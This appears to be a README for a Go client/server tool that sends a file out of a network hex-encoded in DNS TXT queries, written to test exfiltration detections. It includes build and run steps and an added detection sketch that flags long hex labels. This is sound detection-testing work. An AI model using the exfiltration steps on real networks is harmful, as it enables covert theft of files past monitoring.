Simple client/server in golang to help with testing data exfil detections over DNS TXT records. Note: this utility is intended for detections testing rather than for use in red team operations, as this does not contain opsec controls (uses simple hex encoding).
On Server Host:
-
- cd dns-TXT-exfil-test/server
- go get github.com/miekg/dns
- go build
- ./server
On Client Host:
-
- cd dns-TXT-exfil-test/client
- sed -i -e 's|10.10.10.10|IP_OF_YOUR_SERVER_HOST|g' client.go
- go build
- ./client [path_to_file_to_exfil]
From a detections perspective, this is how this tool works:
- The client takes the file, breaks it into 50 character hex encoded chunks
- The client then takes each 50 character chunk and sends it in a DNS TXT record request as follows:
  [hex_file_data].macconsultants.com, TYPE: TXT, CLASS IN
- The server takes each 50 character hex encoded chunk, unhexlifies it, and writes it to a file in the current directory named "outfile"
- The server also sends a TXT answer to that query as follows:
  [hex_file_data].macconsultants.com, TYPE TXT, CLASS IN
This can be a helpful way to validate any detections around suspicious DNS TXT traffic.
Note: This tool gets all but the last 4-5 bytes of the sent file, due to how I perform the parsing on the server side. However, this is still sufficient for testing exfil over TXT records.
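A detection for the query pattern described above can be sketched as follows. This is an added example, not code from this repository: it counts TXT queries whose leftmost label is a long hex string, grouped by parent domain. The `Query` record shape, the function names, the thresholds and the sample records are all assumptions constructed for illustration.

```go
package main

import (
	"encoding/hex"
	"fmt"
	"strings"
)

// Query is a simplified DNS log record (hypothetical shape, not a real log schema).
type Query struct{ Name, QType string }

// hexParent returns the parent domain when the leftmost label is valid hex
// of at least minLen characters.
func hexParent(name string, minLen int) (string, bool) {
	label, parent, ok := strings.Cut(strings.ToLower(strings.TrimSuffix(name, ".")), ".")
	if !ok || len(label) < minLen {
		return "", false
	}
	_, err := hex.DecodeString(label) // fails on odd length or non-hex characters
	return parent, err == nil
}

// SuspectParents counts TXT queries with long hex labels per parent domain and
// keeps parents seen at least threshold times.
func SuspectParents(qs []Query, minLen, threshold int) map[string]int {
	counts := map[string]int{}
	for _, q := range qs {
		if parent, ok := hexParent(q.Name, minLen); ok && strings.EqualFold(q.QType, "TXT") {
			counts[parent]++
		}
	}
	for p, n := range counts {
		if n < threshold {
			delete(counts, p)
		}
	}
	return counts
}

// SampleQueries returns constructed records: a 60-byte payload in 25-byte
// (50 hex character) chunks as described above, plus benign noise.
func SampleQueries() []Query {
	data := []byte(strings.Repeat("constructed!", 5))
	chunk := func(a, b int) string { return hex.EncodeToString(data[a:b]) }
	return []Query{{"_dmarc.example.com", "TXT"}, {"deadbeef.example.com", "TXT"},
		{chunk(0, 25) + ".macconsultants.com", "TXT"}, {chunk(25, 50) + ".macconsultants.com.", "TXT"},
		{chunk(50, 60) + ".macconsultants.com", "TXT"}, {chunk(0, 25) + ".example.net", "A"}}
}

func main() { fmt.Println(SuspectParents(SampleQueries(), 50, 2)) }
```

With a minimum label length of 50 the short final chunk is not counted, so a rule tuned this way relies on the volume of full-length chunks rather than on seeing every query.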